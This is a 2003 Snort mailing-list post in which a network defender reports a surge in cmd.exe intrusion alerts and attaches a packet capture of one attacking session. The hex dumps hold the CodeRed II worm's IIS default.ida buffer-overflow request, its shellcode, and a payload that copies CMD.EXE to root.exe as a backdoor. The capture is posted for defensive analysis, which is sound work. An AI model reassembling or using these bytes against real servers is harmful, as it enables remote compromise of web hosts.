Snort mailing list archives
Re: different CMD.exe access?!?
From: Bamm Visscher <bamm () satx rr com>
Date: Tue, 11 Mar 2003 10:48:32 -0600
I am seeing the same thing from all over (I've been grumbling in #snort all morning). Looks like maybe a variant of CodeRed; could another worm be infecting hosts and then spawning CodeRed scans? At first I thought it was a change in configuration on the network somewhere, but the amount of traffic I am seeing is steadily increasing.

From 0900-1000 (GMT) I had 4 cmd.exe alerts.
From 1000-1100: 59
From 1100-1200: 429
From 1200-1300: 1245
From 1300-1400: 1645
From 1400-1500: 1869
From 1500-1600: 1973

Bammkkkk

************* Warning Big Session Trace Below ************************

Reading network traffic from "/var/log/snort/rawdata/2003-03-11/wmst-ids01/wmst-ids01_0311_61.180.83.4:4975-162.18.223.169:80.raw" file.
snaplen = 1514

--== Initialization Complete ==--

03/11-16:01:53.174297 61.180.83.4:4975 -> 162.18.223.169:80
TCP TTL:105 TOS:0x0 ID:2756 IpLen:20 DgmLen:48 DF
******S* Seq: 0x445C789E Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 00 30 0A C4 40 00 69 06 F4 8F 3D B4 53 04 A2 12 .0..@.i...=.S...
0x0020: DF A9 13 6F 00 50 44 5C 78 9E 00 00 00 00 70 02 ...o.PD\x.....p.
0x0030: 40 00 5F F1 00 00 02 04 05 B4 01 01 04 02 @._...........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:53.175053 162.18.223.169:80 -> 61.180.83.4:4975
TCP TTL:64 TOS:0x0 ID:3403 IpLen:20 DgmLen:44
***A**S* Seq: 0x4216D51D Ack: 0x445C789F Win: 0x4000 TcpLen: 24
TCP Options (1) => MSS: 512
0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E.
0x0010: 00 2C 0D 4B 00 00 40 06 5B 0D A2 12 DF A9 3D B4 .,.K..@.[.....=.
0x0020: 53 04 00 50 13 6F 42 16 D5 1D 44 5C 78 9F 60 12 S..P.oB...D\x.`.
0x0030: 40 00 61 67 00 00 02 04 02 00 00 00 @.ag........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:53.652042 61.180.83.4:4975 -> 162.18.223.169:80
TCP TTL:105 TOS:0x0 ID:2818 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x445C789F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 00 28 0B 02 40 00 69 06 F4 59 3D B4 53 04 A2 12 .(..@.i..Y=.S...
0x0020: DF A9 13 6F 00 50 44 5C 78 9F 42 16 D5 1E 50 10 ...o.PD\x.B...P.
0x0030: 40 00 75 70 00 00 00 00 00 00 00 00 @.up........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:53.668739 61.180.83.4:4975 -> 162.18.223.169:80
TCP TTL:105 TOS:0x0 ID:2819 IpLen:20 DgmLen:552 DF
***A**** Seq: 0x445C789F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 02 28 0B 03 40 00 69 06 F2 58 3D B4 53 04 A2 12 .(..@.i..X=.S...
0x0020: DF A9 13 6F 00 50 44 5C 78 9F 42 16 D5 1E 50 10 ...o.PD\x.B...P.
0x0030: 40 00 18 77 00 00 47 45 54 20 2F 64 65 66 61 75 @..w..GET /defau
0x0040: 6C 74 2E 69 64 61 3F 58 58 58 58 58 58 58 58 58 lt.ida?XXXXXXXXX
0x0050: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0x0060: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0x0070: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0x0080: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0x0090: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0x00A0: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0x00B0: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0x00C0: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0x00D0: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0x00E0: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0x00F0: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0x0100: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0x0110: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0x0120: 58 58 58 58 58 58 58 25 75 39 30 39 30 25 75 36 XXXXXXX%u9090%u6
0x0130: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25 858%ucbd3%u7801%
0x0140: 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 u9090%u6858%ucbd
0x0150: 33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 36 3%u7801%u9090%u6
0x0160: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25 858%ucbd3%u7801%
0x0170: 75 39 30 39 30 25 75 39 30 39 30 25 75 38 31 39 u9090%u9090%u819
0x0180: 30 25 75 30 30 63 33 25 75 30 30 30 33 25 75 38 0%u00c3%u0003%u8
0x0190: 62 30 30 25 75 35 33 31 62 25 75 35 33 66 66 25 b00%u531b%u53ff%
0x01A0: 75 30 30 37 38 25 75 30 30 30 30 25 75 30 30 3D u0078%u0000%u00=
0x01B0: 61 20 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E a  HTTP/1.0..Con
0x01C0: 74 65 6E 74 2D 74 79 70 65 3A 20 74 65 78 74 2F tent-type: text/
0x01D0: 78 6D 6C 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 xml.Content-leng
0x01E0: 74 68 3A 20 33 33 37 39 20 0D 0A 0D 0A C8 C8 01 th: 3379 .......
0x01F0: 00 60 E8 03 00 00 00 CC EB FE 64 67 FF 36 00 00 .`........dg.6..
0x0200: 64 67 89 26 00 00 E8 DF 02 00 00 68 04 01 00 00 dg.&.......h....
0x0210: 8D 85 5C FE FF FF 50 FF 55 9C 8D 85 5C FE FF FF ..\...P.U...\...
0x0220: 50 FF 55 98 8B 40 10 8B 08 89 8D 58 FE FF FF FF P.U..@.....X....
0x0230: 55 E4 3D 04 04 00 U.=...

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:53.672406 162.18.223.169:80 -> 61.180.83.4:4975
TCP TTL:64 TOS:0x0 ID:3413 IpLen:20 DgmLen:40
***A**** Seq: 0x4216D51E Ack: 0x445C7A9F Win: 0x4000 TcpLen: 20
0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E.
0x0010: 00 28 0D 55 00 00 40 06 5B 07 A2 12 DF A9 3D B4 .(.U..@.[.....=.
0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 7A 9F 50 10 S..P.oB...D\z.P.
0x0030: 40 00 73 70 00 00 00 00 00 00 00 00 @.sp........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:53.674969 61.180.83.4:4975 -> 162.18.223.169:80
TCP TTL:105 TOS:0x0 ID:2820 IpLen:20 DgmLen:552 DF
***A**** Seq: 0x445C7A9F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 02 28 0B 04 40 00 69 06 F2 57 3D B4 53 04 A2 12 .(..@.i..W=.S...
0x0020: DF A9 13 6F 00 50 44 5C 7A 9F 42 16 D5 1E 50 10 ...o.PD\z.B...P.
0x0030: 40 00 8E A6 00 00 00 0F 94 C1 3D 04 08 00 00 0F @.........=.....
0x0040: 94 C5 0A CD 0F B6 C9 89 8D 54 FE FF FF 8B 75 08 .........T....u.
0x0050: 81 7E 30 9A 02 00 00 0F 84 C4 00 00 00 C7 46 30 .~0...........F0
0x0060: 9A 02 00 00 E8 0A 00 00 00 43 6F 64 65 52 65 64 .........CodeRed
0x0070: 49 49 00 8B 1C 24 FF 55 D8 66 0B C0 0F 95 85 38 II...$.U.f.....8
0x0080: FE FF FF C7 85 50 FE FF FF 01 00 00 00 6A 00 8D .....P.......j..
0x0090: 85 50 FE FF FF 50 8D 85 38 FE FF FF 50 8B 45 08 .P...P..8...P.E.
0x00A0: FF 70 08 FF 90 84 00 00 00 80 BD 38 FE FF FF 01 .p.........8....
0x00B0: 74 68 53 FF 55 D4 FF 55 EC 01 45 84 69 BD 54 FE thS.U..U..E.i.T.
0x00C0: FF FF 2C 01 00 00 81 C7 2C 01 00 00 E8 D2 04 00 ..,.....,.......
0x00D0: 00 F7 D0 0F AF C7 89 46 34 8D 45 88 50 6A 00 FF .......F4.E.Pj..
0x00E0: 75 08 E8 05 00 00 00 E9 01 FF FF FF 6A 00 6A 00 u...........j.j.
0x00F0: FF 55 F0 50 FF 55 D0 4F 75 D2 E8 3B 05 00 00 69 .U.P.U.Ou..;...i
0x0100: BD 54 FE FF FF 00 5C 26 05 81 C7 00 5C 26 05 57 .T....\&....\&.W
0x0110: FF 55 E8 6A 00 6A 16 FF 55 8C 6A FF FF 55 E8 EB .U.j.j..U.j..U..
0x0120: F9 8B 46 34 29 45 84 6A 64 FF 55 E8 8D 85 3C FE ..F4)E.jd.U...<.
0x0130: FF FF 50 FF 55 C0 0F B7 85 3C FE FF FF 3D 88 88 ..P.U....<...=..
0x0140: 00 00 73 CF 0F B7 85 3E FE FF FF 83 F8 0A 73 C3 ..s....>......s.
0x0150: 66 C7 85 70 FF FF FF 02 00 66 C7 85 72 FF FF FF f..p.....f..r...
0x0160: 00 50 E8 64 04 00 00 89 9D 74 FF FF FF 6A 00 6A .P.d.....t...j.j
0x0170: 01 6A 02 FF 55 B8 83 F8 FF 74 F2 89 45 80 6A 01 .j..U....t..E.j.
0x0180: 54 68 7E 66 04 80 FF 75 80 FF 55 A4 59 6A 10 8D Th~f...u..U.Yj..
0x0190: 85 70 FF FF FF 50 FF 75 80 FF 55 B0 BB 01 00 00 .p...P.u..U.....
0x01A0: 00 0B C0 74 4B 33 DB FF 55 94 3D 33 27 00 00 75 ...tK3..U.=3'..u
0x01B0: 3F C7 85 68 FF FF FF 0A 00 00 00 C7 85 6C FF FF ?..h.........l..
0x01C0: FF 00 00 00 00 C7 85 60 FF FF FF 01 00 00 00 8B .......`........
0x01D0: 45 80 89 85 64 FF FF FF 8D 85 68 FF FF FF 50 6A E...d.....h...Pj
0x01E0: 00 8D 85 60 FF FF FF 50 6A 00 6A 01 FF 55 A0 93 ...`...Pj.j..U..
0x01F0: 6A 00 54 68 7E 66 04 80 FF 75 80 FF 55 A4 59 83 j.Th~f...u..U.Y.
0x0200: FB 01 75 31 E8 00 00 00 00 58 2D D3 03 00 00 6A ..u1.....X-....j
0x0210: 00 68 EA 0E 00 00 50 FF 75 80 FF 55 AC 3D EA 0E .h....P.u..U.=..
0x0220: 00 00 75 11 6A 00 6A 01 8D 85 5C FE FF FF 50 FF ..u.j.j...\...P.
0x0230: 75 80 FF 55 A8 FF u..U..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:53.872341 162.18.223.169:80 -> 61.180.83.4:4975
TCP TTL:64 TOS:0x0 ID:3418 IpLen:20 DgmLen:40
***A**** Seq: 0x4216D51E Ack: 0x445C7C9F Win: 0x4000 TcpLen: 20
0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E.
0x0010: 00 28 0D 5A 00 00 40 06 5B 02 A2 12 DF A9 3D B4 .(.Z..@.[.....=.
0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 7C 9F 50 10 S..P.oB...D\|.P.
0x0030: 40 00 71 70 00 00 00 00 00 00 00 00 @.qp........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:54.087339 61.180.83.4:4975 -> 162.18.223.169:80
TCP TTL:105 TOS:0x0 ID:2856 IpLen:20 DgmLen:552 DF
***A**** Seq: 0x445C7C9F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 02 28 0B 28 40 00 69 06 F2 33 3D B4 53 04 A2 12 .(.(@.i..3=.S...
0x0020: DF A9 13 6F 00 50 44 5C 7C 9F 42 16 D5 1E 50 10 ...o.PD\|.B...P.
0x0030: 40 00 DB 74 00 00 75 80 FF 55 B4 E9 E7 FE FF FF @..t..u..U......
0x0040: BB 00 00 DF 77 81 C3 00 00 01 00 81 FB 00 00 00 ....w...........
0x0050: 78 75 05 BB 00 00 F0 BF 60 E8 0E 00 00 00 8B 64 xu......`......d
0x0060: 24 08 64 67 8F 06 00 00 58 61 EB D9 64 67 FF 36 $.dg....Xa..dg.6
0x0070: 00 00 64 67 89 26 00 00 66 81 3B 4D 5A 75 E3 8B ..dg.&..f.;MZu..
0x0080: 4B 3C 81 3C 0B 50 45 00 00 75 D7 8B 54 0B 78 03 K<.<.PE..u..T.x.
0x0090: D3 8B 42 0C 81 3C 03 4B 45 52 4E 75 C5 81 7C 03 ..B..<.KERNu..|.
0x00A0: 04 45 4C 33 32 75 BB 33 C9 49 8B 72 20 03 F3 FC .EL32u.3.I.r ...
0x00B0: 41 AD 81 3C 03 47 65 74 50 75 F5 81 7C 03 04 72 A..<.GetPu..|..r
0x00C0: 6F 63 41 75 EB 03 4A 10 49 D1 E1 03 4A 24 0F B7 ocAu..J.I...J$..
0x00D0: 0C 0B C1 E1 02 03 4A 1C 8B 04 0B 03 C3 89 44 24 ......J.......D$
0x00E0: 24 64 67 8F 06 00 00 58 61 C3 E8 51 FF FF FF 89 $dg....Xa..Q....
0x00F0: 5D FC 89 45 F8 E8 0D 00 00 00 4C 6F 61 64 4C 69 ]..E......LoadLi
0x0100: 62 72 61 72 79 41 00 FF 75 FC FF 55 F8 89 45 F4 braryA..u..U..E.
0x0110: E8 0D 00 00 00 43 72 65 61 74 65 54 68 72 65 61 .....CreateThrea
0x0120: 64 00 FF 75 FC FF 55 F8 89 45 F0 E8 0D 00 00 00 d..u..U..E......
0x0130: 47 65 74 54 69 63 6B 43 6F 75 6E 74 00 FF 75 FC GetTickCount..u.
0x0140: FF 55 F8 89 45 EC E8 06 00 00 00 53 6C 65 65 70 .U..E......Sleep
0x0150: 00 FF 75 FC FF 55 F8 89 45 E8 E8 17 00 00 00 47 ..u..U..E......G
0x0160: 65 74 53 79 73 74 65 6D 44 65 66 61 75 6C 74 4C etSystemDefaultL
0x0170: 61 6E 67 49 44 00 FF 75 FC FF 55 F8 89 45 E4 E8 angID..u..U..E..
0x0180: 14 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 ....GetSystemDir
0x0190: 65 63 74 6F 72 79 41 00 FF 75 FC FF 55 F8 89 45 ectoryA..u..U..E
0x01A0: E0 E8 0A 00 00 00 43 6F 70 79 46 69 6C 65 41 00 ......CopyFileA.
0x01B0: FF 75 FC FF 55 F8 89 45 DC E8 10 00 00 00 47 6C .u..U..E......Gl
0x01C0: 6F 62 61 6C 46 69 6E 64 41 74 6F 6D 41 00 FF 75 obalFindAtomA..u
0x01D0: FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C 6F 62 ..U..E......Glob
0x01E0: 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC FF 55 alAddAtomA..u..U
0x01F0: F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65 48 61 ..E......CloseHa
0x0200: 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0 E8 08 ndle..u..U..E...
0x0210: 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC FF 55 ..._lcreat..u..U
0x0220: F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69 74 65 ..E......_lwrite
0x0230: 00 FF 75 FC FF 55 ..u..U

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:54.101265 61.180.83.4:4975 -> 162.18.223.169:80
TCP TTL:105 TOS:0x0 ID:2857 IpLen:20 DgmLen:552 DF
***A**** Seq: 0x445C7E9F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 02 28 0B 29 40 00 69 06 F2 32 3D B4 53 04 A2 12 .(.)@.i..2=.S...
0x0020: DF A9 13 6F 00 50 44 5C 7E 9F 42 16 D5 1E 50 10 ...o.PD\~.B...P.
0x0030: 40 00 8E BD 00 00 F8 89 45 C8 E8 08 00 00 00 5F @.......E......_
0x0040: 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89 45 C4 lclose..u..U..E.
0x0050: E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D 54 69 .....GetSystemTi
0x0060: 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B 00 00 me..u..U..E.....
0x0070: 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55 F4 89 .WS2_32.DLL..U..
0x0080: 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 FF 75 E......socket..u
0x0090: BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C 6F 73 ..U..E......clos
0x00A0: 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 esocket..u..U..E
0x00B0: B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 6B 65 ......ioctlsocke
0x00C0: 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 00 00 t..u..U..E......
0x00D0: 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 89 45 connect..u..U..E
0x00E0: B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF 75 BC ......select..u.
0x00F0: FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E 64 00 .U..E......send.
0x0100: FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 72 65 .u..U..E......re
0x0110: 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C 00 00 cv..u..U..E.....
0x0120: 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF 75 BC .gethostname..u.
0x0130: FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 68 6F .U..E......getho
0x0140: 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 F8 89 stbyname..u..U..
0x0150: 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C 61 73 E......WSAGetLas
0x0160: 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 45 94 tError..u..U..E.
0x0170: E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C 4C 00 .....USER32.DLL.
0x0180: FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 74 57 .U..E......ExitW
0x0190: 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 F8 89 indowsEx..u..U..
0x01A0: 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 45 84 E...E.i.....@.E.
0x01B0: 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E1 FF ...xV4..........
0x01C0: FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF FF FF ..<.t.<.t.......
0x01D0: 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC FF FF ................
0x01E0: FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF FF 83 ................
0x01F0: E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF FF 00 ... ............
0x0200: FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF FF 00 ................
0x0210: 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 D0 23 .......Y...#...#
0x0220: 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB E0 74 .X........t....t
0x0230: 9A 3B 9D 58 FE FF .;.X..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:54.101525 162.18.223.169:80 -> 61.180.83.4:4975
TCP TTL:64 TOS:0x0 ID:3422 IpLen:20 DgmLen:40
***A**** Seq: 0x4216D51E Ack: 0x445C809F Win: 0x4000 TcpLen: 20
0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E.
0x0010: 00 28 0D 5E 00 00 40 06 5A FE A2 12 DF A9 3D B4 .(.^..@.Z.....=.
0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 80 9F 50 10 S..P.oB...D\..P.
0x0030: 40 00 6D 70 00 00 00 00 00 00 00 00 @.mp........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:54.378026 61.180.83.4:4975 -> 162.18.223.169:80
TCP TTL:105 TOS:0x0 ID:2877 IpLen:20 DgmLen:552 DF
***A**** Seq: 0x445C809F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 02 28 0B 3D 40 00 69 06 F2 1E 3D B4 53 04 A2 12 .(.=@.i...=.S...
0x0020: DF A9 13 6F 00 50 44 5C 80 9F 42 16 D5 1E 50 10 ...o.PD\..B...P.
0x0030: 40 00 36 F3 00 00 FF 74 92 C3 68 04 01 00 00 8D @.6....t..h.....
0x0040: 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE FF FF .\...P.U....\...
0x0050: E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 5E FC .....\CMD.EXE.^.
0x0060: A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A 5C 69 ....cj......d:\i
0x0070: 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 5C 72 netpub\scripts\r
0x0080: 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D 85 5C oot.exe...$....\
0x0090: FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 64 3A ...P.U.j..+...d:
0x00A0: 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D 6F 6E \progra~1\common
0x00B0: 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 43 5C ~1\system\MSADC\
0x00C0: 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D 85 root.exe...$....
0x00D0: 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC 4D 5A \...P.U.......MZ
0x00E0: 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 P...............
0x00F0: 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC FC FC ......@.........
0x0100: FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD 2A 25 .....PE..L....*%
0x0110: 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B 01 02 )...............
0x0120: 19 00 04 00 00 00 08 00 00 00 00 00 00 00 10 00 ................
0x0130: 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 ...... ....@....
0x0140: 00 00 04 00 00 01 00 00 00 00 00 00 00 03 00 0A ................
0x0150: 00 00 00 00 00 00 40 00 00 00 04 00 00 00 00 00 ......@.........
0x0160: 00 02 00 00 00 00 00 10 00 00 20 00 00 00 00 10 .......... .....
0x0170: 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 ................
0x0180: 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC 00 00 ......0.........
0x0190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x01A0: 00 00 00 00 00 00 00 00 00 10 00 00 00 10 00 00 ................
0x01B0: 00 04 00 00 00 08 00 00 00 00 00 00 00 00 00 00 ................
0x01C0: 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 .... ..`........
0x01D0: 00 10 00 00 00 20 00 00 00 04 00 00 00 0C 00 00 ..... ..........
0x01E0: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 ............@...
0x01F0: 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 .............0..
0x0200: 00 04 00 00 00 10 00 00 00 00 00 00 00 00 00 00 ................
0x0210: 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC FC FC ....@...........
0x0220: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
0x0230: FC FC FC FC FC FC ......

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/11-16:01:54.390442 61.180.83.4:4975 -> 162.18.223.169:80
TCP TTL:105 TOS:0x0 ID:2878 IpLen:20 DgmLen:552 DF
***A**** Seq: 0x445C829F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20
0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E.
0x0010: 02 28 0B 3E 40 00 69 06 F2 1D 3D B4 53 04 A2 12 .(.>@.i...=.S...
0x0020: DF A9 13 6F 00 50 44 5C 82 9F 42 16 D5 1E 50 10 ...o.PD\..B...P.
0x0030: 40 00 62 77 00 00 FC FC FC FC FC FC FC FC FC FC @.bw............
0x0040: FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x0050: 00 00 00 00 68 04 01 00 00 68 D0 20 40 00 E8 61 ....h....h. @..a
0x0060: 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00 A5 A5 ...... @... @...
0x0070: A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00 E8 0C ..j.h. @..L.....
0x0080: 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB EF 68 ...h.'...1.....h
0x0090: D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20 40 00 .$@.h?...j.h. @.
0x00A0: 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26 6A 04 h.....2.....u&j.
0x00B0: 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00 FF 35 hT @.j.j.hH @..5
0x00C0: D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40 00 E8 .$@.......5.$@..
0x00D0: 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00 6A 00 ....h.$@.h?...j.
0x00E0: 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00 00 0B hX @.h..........
0x00F0: C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD A8 20 .uU.. @..L..... 
0x0100: 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00 6A 01 @..B...j.h. @.j.
0x0110: 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8 B4 00 j.h. @..5.$@....
0x0120: 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68 B4 20 ..j.h. @.j.j.h. 
0x0130: 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF 35 D8 @..5.$@.......5.
0x0140: 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40 00 00 $@..........$@..
0x0150: 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68 D4 24 ...h.$@.h. @.h.$
0x0160: 40 00 6A 00 55 FF 35 D8 24 40 00 E8 60 00 00 00 @.j.U.5.$@..`...
0x0170: 0B C0 75 49 A1 D0 24 40 00 0B C0 74 40 BE D0 20 ..uI..$@...t@.. 
0x0180: 40 00 80 3E 00 74 36 46 66 81 7E FE 2C 2C 75 F2 @..>.t6Ff.~.,,u.
0x0190: C7 06 32 31 37 00 81 EE CC 20 40 00 89 35 D0 24 ..217.... @..5.$
0x01A0: 40 00 FF 35 D0 24 40 00 68 D0 20 40 00 6A 01 6A @..5.$@.h. @.j.j
0x01B0: 00 55 FF 35 D8 24 40 00 E8 19 00 00 00 C3 FF 25 .U.5.$@........%
0x01C0: 60 30 40 00 FF 25 64 30 40 00 FF 25 68 30 40 00 `0@..%d0@..%h0@.
0x01D0: FF 25 70 30 40 00 FF 25 74 30 40 00 FF 25 78 30 .%p0@..%t0@..%x0
0x01E0: 40 00 FF 25 7C 30 40 FC FC FC FC FC FC FC FC FC @..%|0@.........
0x01F0: FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................
